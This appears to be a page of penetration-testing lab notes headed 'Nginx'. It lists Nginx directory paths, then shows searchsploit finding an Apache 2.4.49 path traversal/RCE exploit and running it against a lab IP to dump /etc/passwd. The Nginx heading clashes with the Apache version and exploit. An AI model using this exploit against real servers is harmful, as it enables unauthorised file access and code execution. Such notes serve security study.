Nginx

Directories

Webroot

/usr/share/nginx/html/

Config

/etc/nginx/nginx.conf

Logs

/var/log/nginx/

Versions

2.4.49

# Search for public exploits
$ searchsploit Apache httpd 2.4.49
...
--------------------------------------------------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
--------------------------------------------------------------------------

# Create a file with the target's socket
$ echo "192.168.X.245:8000" > web01_ip.txt

# Exploit the target
$ ./50383.sh web01_ip.txt /etc/passwd
http://192.168.X.245:8000
root:x:0:0:root:/root:/bin/bash
...
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
PreviousIISNextTomcat

Last updated

Was this helpful?